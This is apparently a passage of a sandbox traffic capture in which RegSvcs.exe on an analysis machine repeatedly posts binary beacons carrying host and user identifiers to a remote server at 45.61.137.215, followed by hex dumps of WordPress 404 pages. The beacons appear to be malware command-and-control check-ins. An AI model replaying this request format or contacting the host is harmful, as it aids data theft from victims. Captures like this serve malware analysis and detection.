                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:43:54.844218969 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.94975545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:55.212846041 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:55.217894077 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:57.950268030 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:55 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:57.950299025 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:57.950335979 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:57.950346947 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:57.950357914 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:57.950368881 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:43:57.950382948 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:43:57.950392962 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:43:57.950427055 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:57.950453997 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.94975645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:58.198556900 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:58.210539103 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:00.739684105 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:58 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:00.739712000 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:00.739722967 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:00.739732981 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:00.739743948 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:00.739757061 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:00.739984989 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:00.740019083 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:00.740030050 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:00.740041018 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.94975745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:00.934566021 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:00.941057920 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:03.554755926 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:01 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:03.554774046 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:03.554785967 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:03.554796934 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:03.554809093 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:03.554920912 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:03.554934025 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
